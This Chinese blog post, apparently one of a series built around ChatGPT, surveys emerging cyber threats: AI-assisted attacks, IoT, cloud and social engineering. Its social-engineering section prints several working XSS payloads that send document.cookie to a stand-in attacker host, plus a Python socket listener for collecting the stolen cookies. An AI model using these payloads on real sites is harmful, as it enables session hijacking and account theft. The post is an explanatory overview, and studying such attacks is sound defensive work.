ChatGPT：你真的了解网络安全吗？浅谈攻击防御进行时之网络攻击新威胁

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时

• • 网络攻击新威胁
  • • 1) 人工智能的应用
    • 2) 5G和物联网的崛起
    • 3) 云安全
    • 4) 社交工程的威胁
  • 总结

ChatGPT（全名：Chat Generative Pre-trained Transformer），美国OpenAI 研发的聊天机器人程序，是人工智能技术驱动的自然语言处理工具。

基于其语言模型庞大、可控制、具有高度扩展性的特点，本文通过对话ChatGPT，浅谈网络安全攻击防御进行时。

目录索引：
ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之传统的网络安全

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之网络安全新定义

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之网络攻击新威胁

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之网络安全新防御

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之网络安全新总结

网络攻击新威胁

基于当前网络安全领域的研究和专家、业内人士的观点和预测，同时也结合了历史上一些大规模网络安全事件的经验教训，关注到技术的发展方向、市场的发展趋势，从多个角度进行分析和综合评估，并根据分析结果得出相应的网络安全趋势。

1) 人工智能的应用

随着人工智能技术的发展，黑客也越来越多地使用AI进行攻击，包括生成虚假信息、自动化渗透测试等。
现实中已经有一些黑客使用人工智能技术进行攻击的例子：

• DeepLocker：这是IBM安全团队最近开发的一种恶意软件，它可以使用人工智能算法来自我保护，并在目标计算机上对特定目标感兴趣的文件进行攻击。它可以识别出特定的用户、设备和应用程序等信息，并自动调整攻击策略和技术。

• AI声音模仿攻击：这是一种利用人工智能来模仿受害者的语音和特征，从而欺骗系统并获取权限或敏感信息的攻击方式。这种攻击已经被用于进行社交工程和电话钓鱼等攻击。

部分AI声音模仿代码：

from pathlib import Path
import soundfile as sf
import os
from paddlespeech.t2s.exps.syn_utils import get_am_output
from paddlespeech.t2s.exps.syn_utils import get_frontend
from paddlespeech.t2s.exps.syn_utils import get_predictor
from paddlespeech.t2s.exps.syn_utils import get_voc_output

# 在其他环境中，记得修改下面这两个变量的路径
am_inference_dir = os.path.join("/home/aistudio/inference", exp_name)
voc_inference_dir = "/home/aistudio/PaddleSpeech/examples/other/tts_finetune/tts3/models/pwgan_aishell3_static_1.1.0"  # 这里以 pwgan_aishell3 为例子

# 音频生成的路径，修改成你音频想要保存的路径
wav_output_dir = "work/inference_demo"

# 选择设备[gpu / cpu]，这里以GPU为例子， 
device = "cpu"

# 想要生成的文本和对应文件名

text_dict = {
    "1": "今天天气真不错，欢迎和我一起玩。",
    "2": "我认为跑步给我的身体带来了健康。",
}

# frontend
frontend = get_frontend(
    lang="mix",
    phones_dict=os.path.join(am_inference_dir, "phone_id_map.txt"),
    tones_dict=None
)

# am_predictor
am_predictor = get_predictor(
    model_dir=am_inference_dir,
    model_file="fastspeech2_mix" + ".pdmodel",
    params_file="fastspeech2_mix" + ".pdiparams",
    device=device)

# voc_predictor
voc_predictor = get_predictor(
    model_dir=voc_inference_dir,
    model_file="pwgan_aishell3" + ".pdmodel",    # 这里以 pwgan_aishell3 为例子，其它模型记得修改此处模型名称
    params_file="pwgan_aishell3" + ".pdiparams",
    device=device)

output_dir = Path(wav_output_dir)
output_dir.mkdir(parents=True, exist_ok=True)

sentences = list(text_dict.items())

merge_sentences = True
fs = 24000
for utt_id, sentence in sentences:
    am_output_data = get_am_output(
        input=sentence,
        am_predictor=am_predictor,
        am="fastspeech2_mix",
        frontend=frontend,
        lang="mix",
        merge_sentences=merge_sentences,
        speaker_dict=os.path.join(am_inference_dir, "phone_id_map.txt"),
        spk_id=0, )
    wav = get_voc_output(
            voc_predictor=voc_predictor, input=am_output_data)
    # 保存文件
    sf.write(output_dir / (utt_id + ".wav"), wav, samplerate=fs)

• GPT-3虚假信息生成：GPT-3是目前最先进的自然语言处理模型之一，可以生成高质量的文章、新闻和评论等文本。黑客可以使用这种技术来生成虚假的信息，例如虚假的社交媒体账户、新闻报道或评论等，以操纵公众舆论或诱骗用户下载恶意软件。

• 自动化渗透测试：黑客可以使用AI来辅助执行渗透测试，并快速识别目标网络中的漏洞和弱点。这种技术可以加速攻击过程并降低发现率。

2) 5G和物联网的崛起

5G和物联网的快速发展将使得更多的设备与网络连接，使得网络的攻击面变得更加复杂。

以下是一些现实中可能出现的例子：

• 智能家居设备受到攻击：智能家居设备如智能门锁、智能音响等通常与互联网相连接。如果黑客能够入侵这些设备，就可以从远程控制这些智能装置，从而威胁您的家庭安全和隐私。

部分串口通讯代码：

if (Serial.available()) {
	serial_cmd = Serial.read();

	switch(serial_cmd) {		
	case '0': {
		Serial.println("\nstart_coordinator(1)");
		if (zigbee_network.start_coordinator(1) == 0) {
			Serial.println("OK");
		}
		else {
			Serial.println("NG");
		}
	}
		break;
	
	case '1': {
		Serial.println("set_permit_joining_req");
		
		zigbee_network.set_permit_joining_req(ALL_ROUTER_AND_COORDINATOR, 60, 1);
	}
		break;
		
	case '3': {
		Serial.println("TOOGLE Switch Req !\n");
		/*
		 * Frame Control, Transaction Sequence Number, Value control
		 * Value control -> 0x00: off, 0x01: on, 0x02: toogle
		*/
		if (control_switch_address) {
			uint8_t st_buffer[3] = { /* Frame control */ 0x01,
									 /* Transaction Sequence Number */0x00,  /* control_switch_cmd_seq++ */
									 /* Value Control */ 0x02}; /* Value Control [ 0x00:OFF , 0x01:ON , 0x02:TOOGLE ] */
			st_buffer[1] = control_switch_cmd_seq++;

			af_data_request_t st_af_data_request;
			st_af_data_request.cluster_id    = ZCL_CLUSTER_ID_PI_GENERIC_TUNNEL;
			st_af_data_request.dst_address   = control_switch_address;
			st_af_data_request.trans_id      = 0x00;
			st_af_data_request.options       = 0x10;
			st_af_data_request.len           = sizeof(st_buffer);
			st_af_data_request.data          = st_buffer;

			zigbee_network.send_af_data_req(st_af_data_request);
		}
		else {
			Serial.println("Please join Switch\n");
		}
	}
		break;

• 城市基础设施受到攻击：许多城市正在实施智慧城市计划，包括监控摄像头、交通信号灯和停车仪器等设备都被连接到互联网上。如果这些设备被黑客入侵，他们可能会瘫痪整个城市的运转，对公众的生活和财产造成毁灭性影响。

• 医疗设备受到攻击：医疗行业中有许多关键的设备和系统，如心脏起搏器和呼吸机等，这些设备也已经与互联网相连。黑客可以通过入侵这些设备来危害患者的生命健康。

• 自动驾驶汽车受到攻击：自动驾驶汽车需要通过网络进行通信，例如控制和信息交换。如果这些汽车被黑客入侵，他们可能会将车辆纵向或横向控制权转移给黑客，从而威胁到驾驶者和其他公众的安全。

3) 云安全

随着云计算技术的广泛应用，云安全的重要性不断提高。

以下是一些云安全攻击的例子：

• 虚假的虚拟机托管服务：攻击者可能会创建虚假的虚拟机托管服务，以窃取企业的数据或获取对其系统的控制权限。

• 数据泄露：由于云环境中存储了大量敏感数据，攻击者可能会针对云数据存储库进行攻击，导致大规模数据泄露。

• 必要服务（例如DNS）的拒绝服务攻击：攻击者可能会利用大量请求来将目标服务器超载，从而禁止必要的服务。

• 云端口扫描攻击：在云环境中，攻击者可以轻松扫描公共IP地址和端口范围，从而突破云环境的防御，并查找弱点。

• 恶意软件攻击：攻击者可能会利用恶意软件入侵和掌控基础设施，以窃取数据、发起拒绝服务攻击，甚至盗用云资源。

4) 社交工程的威胁

社交工程是一种通过操纵人的心理或行为来获取信息或破坏系统安全的攻击方法。

以下是一些社交工程攻击的例子：

• 钓鱼邮件攻击：攻击者发送看似正常的电子邮件，以欺骗一个人点击链接或下载附件。当被点击或下载时，它会导致恶意软件安装或窃取凭据等后果。

• 假冒电话和短信攻击：攻击者会冒充合法机构或个人，例如银行职员或客服代表，并骗取个人的敏感信息，例如密码或社会保险号码。

• 肩膀冲击攻击：攻击者借用在公共场所如电脑网吧或咖啡店等人身边工作、学习或休息的人，利用其电脑屏幕上的敏感信息或工作文档资料，以偷窃公司机密或个人信息。

• 在社交网站上的攻击：攻击者可以通过社交网站如Facebook或LinkedIn寻找特定的个人或目标，并使用社交工程技巧进行欺骗，例如社交工程攻击是指通过伪造的账户发送恶意链接或文件等等。

• 伪造身份攻击：攻击者冒充受害者本人，以便访问私密信息或者获取敏感数据以行骗。
  Cookie外带部分代码：

以下是一些常见的 XSS 的 Cookie 外带攻击语句：

利用 document.cookie 获取当前域下所有 cookie 的值：

<script>new Image().src="http://attacker-site.com/cookie.php?cookie="+document.cookie;</script>

利用 XMLHttpRequest 对象发送 HTTP 请求，将 Cookie 数据发送到攻击者的服务器：

<script>var xhr = new XMLHttpRequest(); xhr.open("POST", "http://attacker-site.com/logger.php", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('url=' + encodeURIComponent(document.location.href) + '&cookie=' + encodeURIComponent(document.cookie));</script>

利用 window.location 对象向攻击者的服务器提交请求，附带当前页面的 URL 和 Cookie：

<script>window.location="http://attacker-site.com/logger.php?url="+encodeURIComponent(document.location.href)+"&cookie="+encodeURIComponent(document.cookie);</script>

利用 document.write 返回页面中的Cookie，并将其拼接到目标URL中，作为参数发送到指定的 IP 地址和端口

<script>document.write('<img src="http://ip:端口号/'+document.cookie+'"/>')</script>

简单启动本机IP地址实现Cookie外带：

import socket

HOST = '本机IP地址'
PORT = 2022

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 创建一个服务器套接字，使用 IPv4 地址族（AF_INET）和 TCP 传输协议（SOCK_STREAM）
server_socket.bind((HOST, PORT))
# 将服务器套接字与特定的主机地址和端口号进行绑定，以便客户端能够找到它
server_socket.listen(1)

print('等待客户端连接...')

# 接受客户端连接
client_socket, addr = server_socket.accept()
print('客户端已连接：', addr)

# 接收客户端发送的数据
data = client_socket.recv(1024)
print('接收到数据：', data.decode())

# 将接收到的数据原样返回给客户端
client_socket.sendall(data)

# 关闭客户端连接
client_socket.close()
# 使用 close() 方法关闭套接字并释放所有相关的资源；

# 关闭服务器套接字
server_socket.close()
# 使用 close() 方法关闭套接字并释放所有相关的资源。

---

总结

以上为浅谈攻击防御进行时之网络攻击新威胁。

关注我，遇见攻击新姿势，吸纳网安新知识。

我是秋说，我们下次见。